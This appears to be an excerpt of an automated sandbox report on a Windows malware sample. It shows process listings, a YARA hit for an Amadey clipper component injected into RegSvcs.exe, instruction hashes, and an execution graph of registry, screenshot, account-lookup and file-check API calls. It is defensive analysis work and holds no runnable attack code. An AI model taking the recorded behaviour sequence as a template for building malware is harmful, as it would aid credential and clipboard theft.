                                                    MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:02:41:58
                                                    Start date:08/01/2025
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                    Imagebase:0x7ff7699e0000
                                                    File size:45'984 bytes
                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey's Clipper DLL, Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:4
                                                    Start time:02:41:58
                                                    Start date:08/01/2025
                                                    Path:C:\Windows\System32\wermgr.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "6544" "2596" "2480" "2600" "0" "0" "2604" "0" "0" "0" "0" "0"
                                                    Imagebase:0x7ff783f90000
                                                    File size:229'728 bytes
                                                    MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1879489636.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffd9bb70000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: H
                                                      • API String ID: 0-2852464175
                                                      • Opcode ID: a2ed96a1640fbbac2dbcb90549ac6651518add707067e8b5aa006c6f0cebb284
                                                      • Instruction ID: 3bc946cc3c99a1784bcf00a2f4bf2fb7708990eb0e098768a0b339a18c54d528
                                                      • Opcode Fuzzy Hash: a2ed96a1640fbbac2dbcb90549ac6651518add707067e8b5aa006c6f0cebb284
                                                      • Instruction Fuzzy Hash: 5BA10622B0EA8D0FE7AADB6848B45B47BE1EF56318B1901FBD08DC75E3DD18A905C351
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1879052852.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffd9baa0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0
                                                      • API String ID: 0-1558408351
                                                      • Opcode ID: 34f819592b754329755a513f0172eab2dd6b9e8eb58747ef82e6f3568c6342f5
                                                      • Instruction ID: 2197b7d18d909bb86020ce3a82cff27a682aaf18c63a34c274caf448969b8512
                                                      • Opcode Fuzzy Hash: 34f819592b754329755a513f0172eab2dd6b9e8eb58747ef82e6f3568c6342f5
                                                      • Instruction Fuzzy Hash: 5AD02231A1E2409FDB2C36B849230363316EB1AA1472170BEC08783072DC7880838E80
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1879052852.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffd9baa0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c3d2fa97acc252f316f3c397aa25230ba1a970780888abfe9d21145fc14fdab2
                                                      • Instruction ID: b959b75c91e37015023925bb0fdce6c6cfa9c53695980f338e58c9a091a6901e
                                                      • Opcode Fuzzy Hash: c3d2fa97acc252f316f3c397aa25230ba1a970780888abfe9d21145fc14fdab2
                                                      • Instruction Fuzzy Hash: C1819D31E0E28A4FD734DBA898651F97BE2EF54300F1501BFD489C72A3EE785A458791
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1879052852.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffd9baa0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 49456fd7cace28a2a66b11a29fe679dcbfcd9cf5de304d4884b4c81925748bab
                                                      • Instruction ID: ed3f0d88deb0fb6997edc2f2ad705cd55268c6ec707298ce25b7412fc3f407b2
                                                      • Opcode Fuzzy Hash: 49456fd7cace28a2a66b11a29fe679dcbfcd9cf5de304d4884b4c81925748bab
                                                      • Instruction Fuzzy Hash: 2E115C62A1EBC55FD32DD7BC486A47DBBD2EF45200B0504BEE0CA8B1F3DD64A5028756
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1879052852.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffd9baa0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fbb171113758a568c7c00e3c82cee4e7e8f9e16d5cd623da1ea80dc79b5d6b36
                                                      • Instruction ID: 2f0218d27a5a01cc1df3e41c3e3f6d6c9c053f9d5e5d7ded78ce0da1ea8d046d
                                                      • Opcode Fuzzy Hash: fbb171113758a568c7c00e3c82cee4e7e8f9e16d5cd623da1ea80dc79b5d6b36
                                                      • Instruction Fuzzy Hash: B5112C61B1EA851FD31DE77C48665BD77D2EF84100B0508BEE0CACB1F3DD64A5028751
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1879052852.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffd9baa0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                      • Instruction ID: e02c57d93778fbc6a584bb8048c67e799a1b42380c49818b8706c6f29e2a7d3a
                                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                      • Instruction Fuzzy Hash: 8F01A77020CB0C4FD748EF0CE051AA6B3E0FF85320F10056DE58AC36A1D632E882CB45
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1879052852.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffd9baa0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bb8b6bd48359692fa01c415565ea2583b41d4d6d37bf18ac4688cc88a90fc6ed
                                                      • Instruction ID: 04ce52abb1ffe6ad4324462e338a18db494bde0e72ecafe841d7c0ead3b91585
                                                      • Opcode Fuzzy Hash: bb8b6bd48359692fa01c415565ea2583b41d4d6d37bf18ac4688cc88a90fc6ed
                                                      • Instruction Fuzzy Hash: AAF0DA74E0920B8FDB50DFA4C5815AEB7F1EF04310F204929D115EB265DB79A7408B94
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1879052852.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffd9baa0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3c2665f9dc6837db9ccf4dddd278245b0af311693f6dd907fbbb64c8da830607
                                                      • Instruction ID: 11c261f94a438a7cbfb1773509b98890acd8ddb0f2dc86d3d6e6d21199613e4c
                                                      • Opcode Fuzzy Hash: 3c2665f9dc6837db9ccf4dddd278245b0af311693f6dd907fbbb64c8da830607
                                                      • Instruction Fuzzy Hash: 94F01775E1920F8BDB10DFA4C4915AEB7F1EF04310F208929D015EB264DA78A6408B90
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1879052852.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffd9baa0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 27ead1c676cf8d7b243a3c3f72aadd30adbb71dfa29f04a07a1866cc8afbaeb9
                                                      • Instruction ID: 205085948d7ac82e31594b76574a25a166dc8053e89d4959c50e3fabddcabba1
                                                      • Opcode Fuzzy Hash: 27ead1c676cf8d7b243a3c3f72aadd30adbb71dfa29f04a07a1866cc8afbaeb9
                                                      • Instruction Fuzzy Hash: A6115BB2B0D6080FA31C9D6C6C56436B79AD3C6220711933FE5CBC23A3E960AC0386C5

                                                      Execution Graph

                                                      Execution Coverage:4.2%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:27.1%
                                                      Total number of Nodes:1294
                                                      Total number of Limit Nodes:13
40630b 34098->34101 34102 406314 __fread_nolock 34099->34102 34100 40625f _Ref_count_obj 34100->34096 34100->34097 34101->33835 34103 406377 RegOpenKeyExA 34102->34103 34104 4063d0 RegCloseKey 34103->34104 34105 4063a6 RegQueryValueExA 34103->34105 34106 406400 34104->34106 34105->34104 34106->34106 34278 424250 34106->34278 34108 406480 _Ref_count_obj 34111 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34108->34111 34109 4064a7 34113 42f02c 25 API calls 34109->34113 34110 406418 _Ref_count_obj 34110->34108 34110->34109 34112 4064a3 34111->34112 34112->33835 34114 4064ac RegOpenKeyExA 34113->34114 34116 406517 RegCloseKey 34114->34116 34117 4064ed RegSetValueExA 34114->34117 34118 406528 _Ref_count_obj 34116->34118 34117->34116 34119 4065e6 34118->34119 34120 4065ce _Ref_count_obj 34118->34120 34122 42f02c 25 API calls 34119->34122 34121 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34120->34121 34123 4065e2 34121->34123 34124 4065eb 34122->34124 34123->33835 34293 431b97 34124->34293 34127 406665 RegCloseKey 34129 406676 _Ref_count_obj 34127->34129 34128 406646 RegSetValueExA 34128->34127 34130 40671c _Ref_count_obj 34129->34130 34131 406734 34129->34131 34133 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34130->34133 34132 42f02c 25 API calls 34131->34132 34135 406739 __wsopen_s 34132->34135 34134 406730 34133->34134 34134->33835 34136 423340 70 API calls 34135->34136 34137 4067a0 34136->34137 34138 4061f0 74 API calls 34137->34138 34139 4067ab RegOpenKeyExA 34138->34139 34142 4067d9 __fread_nolock _Ref_count_obj 34139->34142 34141 406d64 34143 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34141->34143 34142->34141 34144 406d80 34142->34144 34145 406829 RegQueryInfoKeyW 34142->34145 34146 406d7c 34143->34146 34147 42f02c 25 API calls 34144->34147 34148 406d58 RegCloseKey 34145->34148 34228 4068a8 _Ref_count_obj 34145->34228 34146->33835 34149 406d85 GdiplusStartup 34147->34149 34148->34141 34151 
406e39 34149->34151 34162 406e13 34149->34162 34150 4068b2 RegEnumValueA 34150->34228 34152 407534 34151->34152 34153 406e45 34151->34153 34317 4026a0 27 API calls 34152->34317 34297 4256e0 27 API calls std::_Facet_Register 34153->34297 34155 407539 34158 42f02c 25 API calls 34155->34158 34157 424250 27 API calls 34157->34228 34161 407552 GetUserNameA LookupAccountNameA GetSidIdentifierAuthority 34158->34161 34159 406f60 GetDC 34160 423340 70 API calls 34159->34160 34163 406f8b 34160->34163 34166 423340 70 API calls 34161->34166 34162->34159 34162->34162 34165 4061f0 74 API calls 34163->34165 34168 406f96 34165->34168 34167 407626 34166->34167 34170 4061f0 74 API calls 34167->34170 34171 423340 70 API calls 34168->34171 34169 423340 70 API calls 34169->34228 34172 407631 34170->34172 34173 406fb3 34171->34173 34318 402400 44 API calls 34172->34318 34174 4061f0 74 API calls 34173->34174 34176 406fba 34174->34176 34177 423340 70 API calls 34176->34177 34178 406fcf 34177->34178 34179 4061f0 74 API calls 34178->34179 34182 406fd6 34179->34182 34180 4078c3 34183 42f02c 25 API calls 34180->34183 34181 407649 _Ref_count_obj 34181->34180 34184 423340 70 API calls 34181->34184 34189 423340 70 API calls 34182->34189 34186 4078c8 34183->34186 34185 4076b2 34184->34185 34188 4061f0 74 API calls 34185->34188 34187 42f02c 25 API calls 34186->34187 34191 4078cd 34187->34191 34192 4076bd 34188->34192 34190 407002 34189->34190 34193 4061f0 74 API calls 34190->34193 34194 42f02c 25 API calls 34191->34194 34319 402400 44 API calls 34192->34319 34195 40700d 34193->34195 34196 4078d2 34194->34196 34298 425740 34195->34298 34199 407024 34201 425740 27 API calls 34199->34201 34200 40771a GetSidSubAuthorityCount 34202 4077d2 34200->34202 34225 407734 _Ref_count_obj 34200->34225 34212 40703b _Ref_count_obj 34201->34212 34206 424250 27 API calls 34202->34206 34203 4076d7 _Ref_count_obj 34203->34186 34203->34200 34204 407740 GetSidSubAuthority 34205 423340 70 API calls 34204->34205 
34205->34225 34207 407822 34206->34207 34209 424250 27 API calls 34207->34209 34208 4061f0 74 API calls 34208->34225 34211 40786f 34209->34211 34210 40715f _Ref_count_obj 34213 423340 70 API calls 34210->34213 34211->34191 34215 40789b _Ref_count_obj 34211->34215 34212->34155 34212->34210 34214 40719f 34213->34214 34217 4061f0 74 API calls 34214->34217 34218 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34215->34218 34219 4071aa 34217->34219 34220 4078bf 34218->34220 34221 4071b3 34219->34221 34222 4071b5 RegGetValueA 34219->34222 34220->33835 34221->34222 34229 4071e5 _Ref_count_obj 34222->34229 34223 407226 GetSystemMetrics 34226 407234 34223->34226 34227 40722d 34223->34227 34224 40722f GetSystemMetrics 34224->34226 34225->34180 34225->34202 34225->34204 34225->34208 34320 402400 44 API calls 34225->34320 34230 423340 70 API calls 34226->34230 34227->34224 34228->34144 34228->34148 34228->34150 34228->34157 34228->34169 34231 4061f0 74 API calls 34228->34231 34229->34223 34229->34224 34232 40724f 34230->34232 34231->34228 34233 4061f0 74 API calls 34232->34233 34234 40725a RegGetValueA 34233->34234 34236 40728f _Ref_count_obj 34234->34236 34237 4072d3 GetSystemMetrics 34236->34237 34238 4072ca GetSystemMetrics 34236->34238 34240 4072d8 6 API calls 34237->34240 34239 4072d1 34238->34239 34238->34240 34239->34237 34241 4073f8 6 API calls 34240->34241 34242 40736b 34240->34242 34245 40744f _Ref_count_obj 34241->34245 34315 432699 15 API calls 2 library calls 34242->34315 34244 407371 34244->34241 34247 407380 GdipGetImageEncoders 34244->34247 34246 4074e0 GdiplusShutdown 34245->34246 34250 4074f1 _Ref_count_obj 34246->34250 34253 407394 34247->34253 34248 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34249 407530 34248->34249 34249->33835 34250->34248 34252 4073ef 34252->34241 34316 431e51 14 API calls _free 34253->34316 34254->34084 34255->34085 34256->34084 34262 42efb8 25 API calls 3 library calls 34257->34262 34259 42f03b 34260 
42f049 __Getctype 11 API calls 34259->34260 34261 42f048 34260->34261 34262->34259 34321 424110 27 API calls 3 library calls 34263->34321 34265 405dd1 34266 406060 34265->34266 34322 424110 27 API calls 3 library calls 34266->34322 34268 4061c6 34271 4051a0 34268->34271 34270 406095 34270->34268 34323 4303c0 40 API calls __Getctype 34270->34323 34272 405432 34271->34272 34276 405204 34271->34276 34272->34100 34274 405355 34274->34272 34326 425220 27 API calls 3 library calls 34274->34326 34276->34274 34324 4303c0 40 API calls __Getctype 34276->34324 34325 425220 27 API calls 3 library calls 34276->34325 34281 424294 34278->34281 34282 42426e _Yarn 34278->34282 34279 42437e 34329 4026a0 27 API calls 34279->34329 34281->34279 34284 4242e8 34281->34284 34285 42430d 34281->34285 34282->34110 34283 424383 34330 4025c0 27 API calls 2 library calls 34283->34330 34284->34283 34327 4025c0 27 API calls 4 library calls 34284->34327 34290 4242f9 _Yarn 34285->34290 34328 4025c0 27 API calls 4 library calls 34285->34328 34287 424388 _Ref_count_obj 34287->34110 34291 424360 _Ref_count_obj 34290->34291 34292 42f02c 25 API calls 34290->34292 34291->34110 34292->34279 34294 431bb2 34293->34294 34331 4312c1 34294->34331 34297->34162 34299 425783 34298->34299 34300 425910 34299->34300 34301 425850 34299->34301 34305 425788 _Yarn 34299->34305 34366 4026a0 27 API calls 34300->34366 34306 425885 34301->34306 34308 4258ab 34301->34308 34303 425915 34367 4025c0 27 API calls 2 library calls 34303->34367 34305->34199 34306->34303 34307 425890 34306->34307 34364 4025c0 27 API calls 4 library calls 34307->34364 34314 42589d _Yarn 34308->34314 34365 4025c0 27 API calls 4 library calls 34308->34365 34310 42f02c 25 API calls 34312 42591f 34310->34312 34313 425896 34313->34310 34313->34314 34314->34199 34315->34244 34316->34252 34318->34181 34319->34203 34320->34225 34321->34265 34322->34270 34323->34270 34324->34276 34325->34276 34326->34274 34327->34290 34328->34290 34330->34287 34349 430147 
34331->34349 34333 43130c 34334 42e1f7 __fassign 37 API calls 34333->34334 34341 431318 34334->34341 34335 4312d3 34335->34333 34336 4312e8 34335->34336 34348 40661c RegOpenKeyExA 34335->34348 34356 431262 14 API calls __dosmaperr 34336->34356 34338 4312ed 34357 42f01c 25 API calls ___std_exception_copy 34338->34357 34342 431347 34341->34342 34358 431b43 40 API calls 2 library calls 34341->34358 34345 4313b1 34342->34345 34359 431aec 25 API calls 2 library calls 34342->34359 34360 431aec 25 API calls 2 library calls 34345->34360 34346 431477 34346->34348 34361 431262 14 API calls __dosmaperr 34346->34361 34348->34127 34348->34128 34350 43015f 34349->34350 34351 43014c 34349->34351 34350->34335 34362 431262 14 API calls __dosmaperr 34351->34362 34353 430151 34363 42f01c 25 API calls ___std_exception_copy 34353->34363 34355 43015c 34355->34335 34356->34338 34357->34348 34358->34341 34359->34345 34360->34346 34361->34348 34362->34353 34363->34355 34364->34313 34365->34314 34367->34313 34368->33855 34370 42328e 34369->34370 34371 4232b1 _Ref_count_obj 34369->34371 34370->34371 34372 42f02c 25 API calls 34370->34372 34371->33867 34373 4232fc 34372->34373 34374->33878 34375->33886 34376->33890 34377->33897 34378->33891 34379->33894 34380->33900 34382->33862 34383->33864 34384->33873 34385->33877 34387 407c4a 34386->34387 34401 40795f _Ref_count_obj 34386->34401 34388 407d12 34387->34388 34389 407c73 34387->34389 34681 424760 27 API calls 34388->34681 34390 424250 27 API calls 34389->34390 34398 407c92 _Ref_count_obj 34390->34398 34392 407d17 34394 42f02c 25 API calls 34392->34394 34393 424250 27 API calls 34393->34401 34395 407d1c 34394->34395 34396 407ce8 _Ref_count_obj 34397 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34396->34397 34399 407d0b 34397->34399 34398->34392 34398->34396 34399->33907 34401->34387 34401->34388 34401->34392 34401->34393 34680 425aa0 27 API calls _Yarn 34401->34680 34682 42b650 34402->34682 34404 409436 GetVersionExW 34405 
409458 34404->34405 34450 409588 _Ref_count_obj 34404->34450 34407 423340 70 API calls 34405->34407 34406 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34408 409a0d 34406->34408 34409 409467 34407->34409 34496 4043e0 34408->34496 34410 4061f0 114 API calls 34409->34410 34411 409472 34410->34411 34412 423340 70 API calls 34411->34412 34413 409494 34412->34413 34414 4061f0 114 API calls 34413->34414 34415 40949f GetModuleHandleA GetProcAddress 34414->34415 34417 4094c5 _Ref_count_obj 34415->34417 34418 409546 _Ref_count_obj 34417->34418 34421 409a14 34417->34421 34419 409573 GetNativeSystemInfo 34418->34419 34420 409577 GetSystemInfo 34418->34420 34425 40957d 34419->34425 34420->34425 34422 42f02c 25 API calls 34421->34422 34423 409a19 34422->34423 34424 42f02c 25 API calls 34423->34424 34426 409a1e 34424->34426 34427 4096b9 34425->34427 34428 4095df 34425->34428 34425->34450 34430 423340 70 API calls 34427->34430 34429 423340 70 API calls 34428->34429 34432 409600 34429->34432 34431 4096e5 34430->34431 34433 4061f0 114 API calls 34431->34433 34434 4061f0 114 API calls 34432->34434 34435 4096ec 34433->34435 34436 409607 34434->34436 34437 423340 70 API calls 34435->34437 34438 423340 70 API calls 34436->34438 34439 409704 34437->34439 34440 40961f 34438->34440 34441 4061f0 114 API calls 34439->34441 34442 4061f0 114 API calls 34440->34442 34443 40970b 34441->34443 34444 409626 34442->34444 34445 423340 70 API calls 34443->34445 34684 431e8f 40 API calls 34444->34684 34447 40973c 34445->34447 34449 4061f0 114 API calls 34447->34449 34448 409651 34448->34423 34448->34450 34451 409743 34449->34451 34450->34406 34685 4091b0 119 API calls 3 library calls 34451->34685 34453 409752 34454 423340 70 API calls 34453->34454 34455 40978d 34454->34455 34456 4061f0 114 API calls 34455->34456 34457 409794 34456->34457 34458 423340 70 API calls 34457->34458 34459 4097ac 34458->34459 34460 4061f0 114 API calls 34459->34460 34461 4097b3 34460->34461 34462 423340 70 API 
calls 34461->34462 34463 4097e4 34462->34463 34464 4061f0 114 API calls 34463->34464 34465 4097eb 34464->34465 34686 4091b0 119 API calls 3 library calls 34465->34686 34467 4097fa 34468 423340 70 API calls 34467->34468 34469 409835 34468->34469 34470 4061f0 114 API calls 34469->34470 34471 40983c 34470->34471 34472 423340 70 API calls 34471->34472 34473 409854 34472->34473 34474 4061f0 114 API calls 34473->34474 34475 40985b 34474->34475 34476 423340 70 API calls 34475->34476 34477 40988c 34476->34477 34478 4061f0 114 API calls 34477->34478 34479 409893 34478->34479 34687 4091b0 119 API calls 3 library calls 34479->34687 34481 4098a2 34482 423340 70 API calls 34481->34482 34483 4098dd 34482->34483 34484 4061f0 114 API calls 34483->34484 34485 4098e4 34484->34485 34486 423340 70 API calls 34485->34486 34487 4098fc 34486->34487 34488 4061f0 114 API calls 34487->34488 34489 409903 34488->34489 34490 423340 70 API calls 34489->34490 34491 409934 34490->34491 34492 4061f0 114 API calls 34491->34492 34493 40993b 34492->34493 34688 4091b0 119 API calls 3 library calls 34493->34688 34495 40994a 34495->34450 34497 404404 34496->34497 34497->34497 34498 40447d 34497->34498 34499 424250 27 API calls 34497->34499 34500 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34498->34500 34499->34498 34501 40448c 34500->34501 34502 409a20 34501->34502 34503 42b650 __fread_nolock 34502->34503 34504 409a85 GetVersionExW 34503->34504 34505 409aa3 34504->34505 34506 409aad 34504->34506 34508 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34505->34508 34507 423340 70 API calls 34506->34507 34509 409abc 34507->34509 34510 409c05 34508->34510 34511 4061f0 114 API calls 34509->34511 34510->33919 34512 409ac7 34511->34512 34513 423340 70 API calls 34512->34513 34514 409ae9 34513->34514 34515 4061f0 114 API calls 34514->34515 34516 409af4 34515->34516 34517 409afd 34516->34517 34518 409aff GetModuleHandleA GetProcAddress 34516->34518 34517->34518 34519 409b1a 
_Ref_count_obj 34518->34519 34520 409b97 _Ref_count_obj 34519->34520 34522 409c0c 34519->34522 34521 409bc8 GetSystemInfo 34520->34521 34525 409bc4 34520->34525 34521->34525 34523 42f02c 25 API calls 34522->34523 34524 409c11 34523->34524 34525->34505 34527 40b2e0 34526->34527 34527->34527 34528 40b331 34527->34528 34529 40b4ab 34527->34529 34535 40b2f4 _Yarn 34527->34535 34703 4256e0 27 API calls std::_Facet_Register 34528->34703 34704 4026a0 27 API calls 34529->34704 34531 40b4b0 34533 42f02c 25 API calls 34531->34533 34536 40b4b5 34533->34536 34689 423010 34535->34689 34537 40b483 _Ref_count_obj 34538 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34537->34538 34540 40b4a7 34538->34540 34539 40b3e7 34539->34531 34539->34537 34541 40b700 34540->34541 34542 423340 70 API calls 34541->34542 34543 40b742 34542->34543 34544 4061f0 114 API calls 34543->34544 34545 40b74a 34544->34545 34709 40a270 GetTempPathA 34545->34709 34548 425740 27 API calls 34549 40b76f GetFileAttributesA 34548->34549 34551 40b788 _Ref_count_obj 34549->34551 34550 40c689 34553 42f02c 25 API calls 34550->34553 34551->34550 34552 40b853 _Ref_count_obj 34551->34552 34555 423340 70 API calls 34552->34555 34665 40b861 34552->34665 34554 40c6c5 34553->34554 34556 40b87c 34555->34556 34558 4061f0 114 API calls 34556->34558 34557 424250 27 API calls 34559 40c675 GetModuleFileNameA 34557->34559 34560 40b884 34558->34560 34559->33939 34561 40a270 115 API calls 34560->34561 34562 40b898 34561->34562 34563 425740 27 API calls 34562->34563 34564 40b8a9 GetFileAttributesA 34563->34564 34565 40b8c2 _Ref_count_obj 34564->34565 34566 423340 70 API calls 34565->34566 34565->34665 34567 40b9b6 34566->34567 34568 4061f0 114 API calls 34567->34568 34569 40b9be 34568->34569 34570 40a270 115 API calls 34569->34570 34571 40b9d2 34570->34571 34572 425740 27 API calls 34571->34572 34573 40b9e3 GetFileAttributesA 34572->34573 34575 40b9fc _Ref_count_obj 34573->34575 34574 423340 70 API calls 34576 40baf0 
34574->34576 34575->34574 34575->34665 34577 4061f0 114 API calls 34576->34577 34578 40baf8 34577->34578 34579 40a270 115 API calls 34578->34579 34580 40bb0c 34579->34580 34581 425740 27 API calls 34580->34581 34582 40bb1d GetFileAttributesA 34581->34582 34584 40bb36 _Ref_count_obj 34582->34584 34583 423340 70 API calls 34585 40bc2a 34583->34585 34584->34583 34584->34665 34586 4061f0 114 API calls 34585->34586 34587 40bc32 34586->34587 34588 40a270 115 API calls 34587->34588 34589 40bc46 34588->34589 34590 425740 27 API calls 34589->34590 34591 40bc57 GetFileAttributesA 34590->34591 34592 40bc70 _Ref_count_obj 34591->34592 34593 423340 70 API calls 34592->34593 34592->34665 34594 40bd64 34593->34594 34595 4061f0 114 API calls 34594->34595 34596 40bd6c 34595->34596 34597 40a270 115 API calls 34596->34597 34598 40bd80 34597->34598 34599 425740 27 API calls 34598->34599 34600 40bd91 GetFileAttributesA 34599->34600 34601 40bdaa _Ref_count_obj 34600->34601 34602 423340 70 API calls 34601->34602 34601->34665 34603 40be9e 34602->34603 34604 4061f0 114 API calls 34603->34604 34605 40bea6 34604->34605 34606 40a270 115 API calls 34605->34606 34607 40beba 34606->34607 34608 425740 27 API calls 34607->34608 34609 40becb GetFileAttributesA 34608->34609 34610 40bee4 _Ref_count_obj 34609->34610 34611 423340 70 API calls 34610->34611 34610->34665 34612 40bfd8 34611->34612 34613 4061f0 114 API calls 34612->34613 34614 40bfe0 34613->34614 34615 40a270 115 API calls 34614->34615 34616 40bff4 34615->34616 34617 425740 27 API calls 34616->34617 34618 40c005 GetFileAttributesA 34617->34618 34619 40c01e _Ref_count_obj 34618->34619 34620 423340 70 API calls 34619->34620 34619->34665 34621 40c112 34620->34621 34622 4061f0 114 API calls 34621->34622 34623 40c11a 34622->34623 34624 40a270 115 API calls 34623->34624 34625 40c12e 34624->34625 34626 425740 27 API calls 34625->34626 34627 40c13f GetFileAttributesA 34626->34627 34628 40c158 _Ref_count_obj 34627->34628 34629 423340 70 API calls 
34628->34629 34628->34665 34630 40c24c 34629->34630 34631 4061f0 114 API calls 34630->34631 34632 40c254 34631->34632 34633 40a270 115 API calls 34632->34633 34634 40c268 34633->34634 34635 425740 27 API calls 34634->34635 34636 40c279 GetFileAttributesA 34635->34636 34637 40c292 _Ref_count_obj 34636->34637 34638 423340 70 API calls 34637->34638 34637->34665 34639 40c386 34638->34639 34640 4061f0 114 API calls 34639->34640 34641 40c38e 34640->34641 34642 40a270 115 API calls 34641->34642 34643 40c3a2 34642->34643 34644 425740 27 API calls 34643->34644 34645 40c3b3 GetFileAttributesA 34644->34645 34646 40c3cc _Ref_count_obj 34645->34646 34647 423340 70 API calls 34646->34647 34646->34665 34648 40c4c0 34647->34648 34649 4061f0 114 API calls 34648->34649 34650 40c4cb 34649->34650 34651 40a270 115 API calls 34650->34651 34652 40c4e2 34651->34652 34653 425740 27 API calls 34652->34653 34654 40c4f3 GetFileAttributesA 34653->34654 34655 40c50c _Ref_count_obj 34654->34655 34656 4093d0 124 API calls 34655->34656 34655->34665 34657 40c61a 34656->34657 34658 4093d0 124 API calls 34657->34658 34657->34665 34659 40c624 34658->34659 34660 4093d0 124 API calls 34659->34660 34659->34665 34661 40c62e 34660->34661 34662 4093d0 124 API calls 34661->34662 34661->34665 34663 40c638 34662->34663 34664 4093d0 124 API calls 34663->34664 34663->34665 34664->34665 34665->34557 34667 409e46 34666->34667 34668 409e78 _Ref_count_obj 34667->34668 34670 409e93 34667->34670 34669 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34668->34669 34671 409e8f 34669->34671 34672 42f02c 25 API calls 34670->34672 34671->33944 34673 409e98 34672->34673 34675 424909 34674->34675 34676 42491d _Yarn 34675->34676 34726 4254c0 27 API calls 3 library calls 34675->34726 34676->34001 34678->34059 34679->34062 